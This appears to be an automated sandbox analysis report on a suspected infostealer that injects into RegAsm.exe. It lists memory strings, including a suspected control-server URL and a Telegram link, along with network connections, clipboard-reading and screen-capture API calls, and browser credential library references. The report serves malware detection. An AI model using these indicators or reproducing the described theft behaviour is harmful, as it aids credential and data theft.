Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434252843.000000001C54D000.00000004.00000020.00020000.00000000.sdmp, DGDBAK.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: DGDBAK.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 0000000A.00000002.2580289751.00000000006CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tendencerangej.shop/api
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.0000000001605000.00000004.00000020.00020000.00000000.sdmp, JJDBGD.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: FCAAAA.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.0000000001605000.00000004.00000020.00020000.00000000.sdmp, JJDBGD.3.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: FCAAAA.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: DHCAAE.3.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000003.00000002.2434252843.000000001C54D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: DHCAAE.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: RegAsm.exe, 00000003.00000002.2434252843.000000001C54D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: DHCAAE.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: RegAsm.exe, 00000003.00000002.2434252843.000000001C54D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: DHCAAE.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: DHCAAE.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.2434252843.000000001C54D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: DHCAAE.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.6:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.203.61:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.132.206.251:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.6:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.38:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.38:443 -> 192.168.2.4:49775 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_004382A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

10_2_004382A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_004382A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

10_2_004382A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411F55

System Summary

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: BKKKEGIDBG.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 360448

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,		3_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C2662C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,		3_2_6C2662C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D903	3_2_0042D903
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D193	3_2_0042D193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C43C	3_2_0041C43C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004194D4	3_2_004194D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DCEB	3_2_0042DCEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CCFE	3_2_0042CCFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D531	3_2_0042D531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B6DC	3_2_0041B6DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1A6C00	3_2_6C1A6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1BAC30	3_2_6C1BAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0EAC60	3_2_6C0EAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C13ECD0	3_2_6C13ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0DECC0	3_2_6C0DECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C268D20	3_2_6C268D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1AED70	3_2_6C1AED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C20AD50	3_2_6C20AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C176D90	3_2_6C176D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0E4DB0	3_2_6C0E4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C26CDC0	3_2_6C26CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1C0E20	3_2_6C1C0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C17EE70	3_2_6C17EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C166E90	3_2_6C166E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0EAEC0	3_2_6C0EAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C180EC0	3_2_6C180EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C220F20	3_2_6C220F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0E6F10	3_2_6C0E6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C14EF40	3_2_6C14EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1A2F70	3_2_6C1A2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C228FB0	3_2_6C228FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0EEFB0	3_2_6C0EEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1BEFF0	3_2_6C1BEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0E0FE0	3_2_6C0E0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C130820	3_2_6C130820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C16A820	3_2_6C16A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1B4840	3_2_6C1B4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1CC8C0	3_2_6C1CC8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1E68E0	3_2_6C1E68E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C136900	3_2_6C136900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C118960	3_2_6C118960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1A09B0	3_2_6C1A09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1709A0	3_2_6C1709A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C19A9A0	3_2_6C19A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1149F0	3_2_6C1149F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1FC9E0	3_2_6C1FC9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C18EA00	3_2_6C18EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C198A30	3_2_6C198A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C15CA70	3_2_6C15CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C15EA80	3_2_6C15EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C180BA0	3_2_6C180BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1E6BE0	3_2_6C1E6BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C16A430	3_2_6C16A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C144420	3_2_6C144420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0F8460	3_2_6C0F8460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C20A480	3_2_6C20A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1264D0	3_2_6C1264D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C17A4D0	3_2_6C17A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C138540	3_2_6C138540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1E4540	3_2_6C1E4540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C180570	3_2_6C180570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C228550	3_2_6C228550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C142560	3_2_6C142560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0D45B0	3_2_6C0D45B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C16E5F0	3_2_6C16E5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1AA5E0	3_2_6C1AA5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C13C650	3_2_6C13C650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1046D0	3_2_6C1046D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C13E6E0	3_2_6C13E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C17E6E0	3_2_6C17E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C160700	3_2_6C160700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C10A7D0	3_2_6C10A7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1A8010	3_2_6C1A8010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1AC000	3_2_6C1AC000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C12E070	3_2_6C12E070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0D8090	3_2_6C0D8090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1BC0B0	3_2_6C1BC0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0F00B0	3_2_6C0F00B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C156130	3_2_6C156130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1C4130	3_2_6C1C4130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C148140	3_2_6C148140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0E01E0	3_2_6C0E01E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1AA210	3_2_6C1AA210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1B8220	3_2_6C1B8220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C178250	3_2_6C178250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C168260	3_2_6C168260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1AE2B0	3_2_6C1AE2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1B22A0	3_2_6C1B22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C2662C0	3_2_6C2662C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C152320	3_2_6C152320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0E8340	3_2_6C0E8340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C222370	3_2_6C222370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C176370	3_2_6C176370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0E2370	3_2_6C0E2370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1FC360	3_2_6C1FC360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C13E3B0	3_2_6C13E3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1123A0	3_2_6C1123A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1343E0	3_2_6C1343E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0F1C30	3_2_6C0F1C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0E3C40	3_2_6C0E3C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C209C40	3_2_6C209C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C17FC80	3_2_6C17FC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C21DCD0	3_2_6C21DCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1A1CE0	3_2_6C1A1CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C143D00	3_2_6C143D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00438040	10_2_00438040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042C070	10_2_0042C070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449070	10_2_00449070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00401000	10_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040B0E0	10_2_0040B0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040C080	10_2_0040C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042D150	10_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004491F0	10_2_004491F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041F193	10_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00409240	10_2_00409240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042C243	10_2_0042C243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004492F0	10_2_004492F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0043E2A0	10_2_0043E2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004012B3	10_2_004012B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00401359	10_2_00401359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00416361	10_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042D3CC	10_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004493D0	10_2_004493D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004483B0	10_2_004483B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004113BD	10_2_004113BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00405460	10_2_00405460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00447429	10_2_00447429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004094D7	10_2_004094D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040A4E0	10_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042B490	10_2_0042B490
